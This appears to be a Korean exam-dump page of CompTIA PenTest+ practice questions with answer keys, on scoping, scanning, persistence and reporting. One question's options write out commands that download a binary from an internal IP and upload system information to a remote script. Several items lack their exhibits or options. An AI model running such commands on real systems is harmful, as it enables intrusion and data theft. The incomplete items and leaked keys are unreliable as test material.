최신 PT0-002 무료덤프 - CompTIA PenTest+ Certification

문제1

Which of the following factors would a penetration tester most likely consider when testing at a location?

A. Verify the tools being used are legal for use at all sites.

B. Establish the time of the day when a test can occur.

C. Ensure all testers can access all sites.

D. Determine if visas are required.

정답: B

설명: (DumpTOP 회원만 볼 수 있음)

문제2

A penetration tester finds a PHP script used by a web application in an unprotected internal source code repository. After reviewing the code, the tester identifies the following:

Which of the following tools will help the tester prepare an attack for this scenario?

A. Nmap and OWASP ZAP

B. Hydra and crunch

C. Netcat and cURL

D. Burp Suite and DIRB

정답: C

설명: (DumpTOP 회원만 볼 수 있음)

문제3

During a penetration test of a server application, a security consultant found that the application randomly crashed or remained stable after opening several simultaneous connections to the application and always submitting the same packets of data. Which of the following is the best sequence of steps the tester should use to understand and exploit the vulnerability?

A. Attacha remotedisassembler to the server application. Establish a small number of connections to the server application. Send fixed packets of data simultaneously using those connections.

B. Attacha remoteprofiler to the server application. Establish a random number of connections to the server application. Send fixed packets of data simultaneously using those connections.

C. Attacha local disassembler to the server application. Establish a single connection to the server application. Send fixed packets of data simultaneously using that connection.

D. Attacha remotedebugger to the server application. Establish a large number of connections to the server application. Send fixed packets of data simultaneously using those connections.

정답: D

설명: (DumpTOP 회원만 볼 수 있음)

문제4

A penetration tester has been hired to examine a website for flaws. During one of the time windows for testing, a network engineer notices a flood of GET requests to the web server, reducing the website's response time by 80%. The network engineer contacts the penetration tester to determine if these GET requests are part of the test. Which of the following BEST describes the purpose of checking with the penetration tester?

A. Situational awareness

B. Rescheduling

C. Deconfliction

D. DDoS defense

정답: C

설명: (DumpTOP 회원만 볼 수 있음)

문제5

The following output is from reconnaissance on a public-facing banking website:

Based on these results, which of the following attacks is MOST likely to succeed?

A. A Heartbleed attack

B. An attack that breaks RC4 encryption

C. A birthday attack on 64-bit ciphers (Sweet32)

D. An attack on a session ticket extension (Ticketbleed)

정답: A

설명: (DumpTOP 회원만 볼 수 있음)

문제6

Which of the following is the most secure method for sending the penetration test report to the client?

A. Sending the penetration test report on an online storage system.

B. Sending the penetration test report inside a password-protected ZIP file.

C. Encrypting the penetration test report with the client's public key and sending it via email.

D. Sending the penetration test report via webmail using an HTTPS connection.

정답: C

설명: (DumpTOP 회원만 볼 수 있음)

문제7

A penetration tester has established an on-path attack position and must now specially craft a DNS query response to be sent back to a target host. Which of the following utilities would BEST support this objective?

A. dig

B. Socat

C. tcpdump

D. Scapy

정답: D

설명: (DumpTOP 회원만 볼 수 있음)

문제8

Which of the following tools should a penetration tester use to crawl a website and build a wordlist using the data recovered to crack the password on the website?

A. Patator

B. CeWL

C. w3af

D. DirBuster

정답: B

설명: (DumpTOP 회원만 볼 수 있음)

문제9

A penetration tester opened a reverse shell on a Linux web server and successfully escalated privileges to root.
During the engagement, the tester noticed that another user logged in frequently as root to perform work tasks.
To avoid disrupting this user's work, which of the following is the BEST option for the penetration tester to maintain root-level persistence on this server during the test?

A. Add a new user with ID 0 to the /etc/passwd file.

B. Upgrade the reverse shell to a true TTY terminal.

C. Add a web shell to the root of the website.

D. Change the password of the root user and revert after the test.

정답: A

설명: (DumpTOP 회원만 볼 수 있음)

문제10

During a vulnerability scan a penetration tester enters the following Nmap command against all of the non-Windows clients:
nmap -sX -T4 -p 21-25, 67, 80, 139, 8080 192.168.11.191
The penetration tester reviews the packet capture in Wireshark and notices that the target responds with an RST packet flag set for all of the targeted ports. Which of the following does this information most likely indicate?

A. The ports in the target range cannot be scanned because they are common UDP ports.

B. Nmap needs more time to scan the ports in the target range.

C. All of the ports in the target range are closed.

D. All of the ports in the target range are open.

정답: C

설명: (DumpTOP 회원만 볼 수 있음)

문제11

A penetration tester is testing a new API for the company's existing services and is preparing the following script:

Which of the following would the test discover?

A. Supported HTTP methods

B. Open web ports on a host

C. Listening web servers in a domain

D. Default web configurations

정답: A

설명: (DumpTOP 회원만 볼 수 있음)

문제12

A penetration tester is performing an assessment for an application that is used by large organizations operating in the heavily regulated financial services industry. The penetration tester observes that the default Admin User account is enabled and appears to be used several times a day by unfamiliar IP addresses. Which of the following is the most appropriate way to remediate this issue?

A. Require local network access.

B. Restrict simultaneous user log-ins.

C. Increase password complexity.

D. Implement system hardening.

정답: A

설명: (DumpTOP 회원만 볼 수 있음)

문제13

A penetration tester is working on a scoping document with a new client. The methodology the client uses includes the following:
* Pre-engagement interaction (scoping and ROE)
* Intelligence gathering (reconnaissance)
* Threat modeling
* Vulnerability analysis
* Exploitation and post exploitation
* Reporting
Which of the following methodologies does the client use?

A. OSSTMM

B. PTES technical guidelines

C. NIST SP 800-115

D. OWASP Web Security Testing Guide

정답: B

설명: (DumpTOP 회원만 볼 수 있음)

문제14

A company conducted a simulated phishing attack by sending its employees emails that included a link to a site that mimicked the corporate SSO portal. Eighty percent of the employees who received the email clicked the link and provided their corporate credentials on the fake site. Which of the following recommendations would BEST address this situation?

A. Implement a recurring cybersecurity awareness education program for all users.

B. Implement multifactor authentication on all corporate applications.

C. Implement an email security gateway to block spam and malware from email communications.

D. Restrict employees from web navigation by defining a list of unapproved sites in the corporate proxy.

정답: A

설명: (DumpTOP 회원만 볼 수 있음)

문제15

A penetration tester wrote the following script to be used in one engagement:

Which of the following actions will this script perform?

A. Look for open ports.

B. Attempt to flood open ports.

C. Create an encrypted tunnel.

D. Listen for a reverse shell.

정답: A

설명: (DumpTOP 회원만 볼 수 있음)

문제16

A penetration tester has obtained a low-privilege shell on a Windows server with a default configuration and now wants to explore the ability to exploit misconfigured service permissions. Which of the following commands would help the tester START this process?

A. certutil
-urlcache -split -f http://192.168.2.124/windows-binaries/ accesschk64.exe

B. wget
http://192.168.2.124/windows-binaries/accesschk64.exe -O accesschk64.exe

C. schtasks /query /fo LIST /v | find /I "Next Run Time:"

D. powershell
(New-Object System.Net.WebClient).UploadFile('http://192.168.2.124/ upload.php', 'systeminfo.txt')

정답: A

설명: (DumpTOP 회원만 볼 수 있음)

문제17

A penetration tester was able to compromise a server and escalate privileges. Which of the following should the tester perform AFTER concluding the activities on the specified target? (Choose two.)

A. Reboot the target server.

B. Restore the server backup.

C. Delete any created credentials.

D. Remove any tools or scripts that were installed.

E. Disable the running services.

F. Remove the logs from the server.

정답: C,D

문제18

A penetration tester who is doing a company-requested assessment would like to send traffic to another system using double tagging. Which of the following techniques would BEST accomplish this goal?

A. Tag nesting

B. RFID cloning

C. RFID tagging

D. Meta tagging

정답: A

설명: (DumpTOP 회원만 볼 수 있음)

문제19

During an assessment, a penetration tester manages to exploit an LFI vulnerability and browse the web log for a target Apache server. Which of the following steps would the penetration tester most likely try NEXT to further exploit the web server? (Choose two.)

정답: B,F

설명: (DumpTOP 회원만 볼 수 있음)

문제20

A penetration tester conducted a vulnerability scan against a client's critical servers and found the following:

Which of the following would be a recommendation for remediation?

A. Implement a patch management plan

B. Deploy a user training program

C. Utilize the secure software development life cycle

D. Configure access controls on each of the servers

정답: A

우리와 연락하기

문의할 점이 있으시면 메일을 보내오세요. 12시간이내에 답장드리도록 하고 있습니다.

근무시간: ( UTC+9 ) 9:00-24:00
월요일~토요일

서포트: 바로 연락하기

최신 PT0-002 무료덤프 - CompTIA PenTest+ Certification

우리와 연락하기

유용한 링크

최신 업데이트